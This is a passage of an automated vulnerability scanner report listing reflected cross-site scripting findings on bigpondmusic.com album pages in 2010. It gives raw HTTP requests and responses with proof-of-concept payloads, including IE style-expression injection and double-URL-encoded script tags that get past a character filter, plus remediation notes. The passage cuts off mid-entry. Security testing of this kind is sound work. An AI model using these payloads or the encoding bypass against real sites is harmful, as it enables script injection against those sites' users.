Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album4292b'%3b33844f2483/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88267
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 was submitted in the h parameter. This input was echoed as e427a"style="x:expression(alert(1))"fe0616ca712 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style%3d"x%3aexpression(alert(1))"fe0616ca712 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 155057
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Paul Kelly - Paul Kelly's Gr ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?h=767746704e427a"style="x:expression(alert(1))"fe0616ca712" /> ...[SNIP]...
2.122. http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60d82"style%3d"x%3aexpression(alert(1))"e1280da1058 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60d82"style="x:expression(alert(1))"e1280da1058 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style%3d"x%3aexpression(alert(1))"e1280da1058=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 154937
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Paul Kelly - Paul Kelly's Gr ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/paul-kelly/paul-kellys-greatest-hits-songs-from-the-south-volume-1-2?60d82"style="x:expression(alert(1))"e1280da1058=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f was submitted in the REST URL parameter 1. This input was echoed as fc80e"><script>alert(1)</script>52b1405e7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumfc80e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e52b1405e7f/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88042
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa9c1'%3b630504def5d was submitted in the REST URL parameter 1. This input was echoed as aa9c1';630504def5d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumaa9c1'%3b630504def5d/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:22:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88225
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.125. http://bigpondmusic.com/album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8a6a7"style="x:expression(alert(1))"e1cd885fe90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/powderfinger/fingerprints-the-best-of-powderfinger-1994-2000?8a6a7"style%3d"x%3aexpression(alert(1))"e1cd885fe90=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:22:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 130253
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8 was submitted in the REST URL parameter 1. This input was echoed as 9aa2b"><script>alert(1)</script>40c385453a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album9aa2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e40c385453a8/rascal-flatts/nothing-like-this HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88467
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab7f7'%3b75a2a29d0bb was submitted in the REST URL parameter 1. This input was echoed as ab7f7';75a2a29d0bb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /albumab7f7'%3b75a2a29d0bb/rascal-flatts/nothing-like-this HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:19:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87847
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce was submitted in the h parameter. This input was echoed as 69564"style="x:expression(alert(1))"a3c04abb6ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/rascal-flatts/nothing-like-this?h=76868968769564"style%3d"x%3aexpression(alert(1))"a3c04abb6ce HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 121041
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.129. http://bigpondmusic.com/album/rascal-flatts/nothing-like-this [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/rascal-flatts/nothing-like-this
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb486"style="x:expression(alert(1))"1f6f0212f93 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/rascal-flatts/nothing-like-this?fb486"style%3d"x%3aexpression(alert(1))"1f6f0212f93=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:18:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 121111
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369 was submitted in the REST URL parameter 1. This input was echoed as c8e4f"><script>alert(1)</script>35d45e20369 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albumc8e4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e35d45e20369/rihanna/loud6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87914
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8987c'%3b2e62406d5a3 was submitted in the REST URL parameter 1. This input was echoed as 8987c';2e62406d5a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /album8987c'%3b2e62406d5a3/rihanna/loud6 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87974
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.132. http://bigpondmusic.com/album/rihanna/loud6 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/album/rihanna/loud6
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4eb56"style="x:expression(alert(1))"b49ea62020f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /album/rihanna/loud6?4eb56"style%3d"x%3aexpression(alert(1))"b49ea62020f=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:21:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 117450
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac was submitted in the REST URL parameter 1. This input was echoed as 16411"><script>alert(1)</script>6c9e03e38ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /album16411%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c9e03e38ac/rihanna/only-girl-in-the-world HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:21:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88233
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae660'%3b66a4ff2fd7f was submitted in the REST URL parameter 1. This input was echoed as ae660';66a4ff2fd7f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
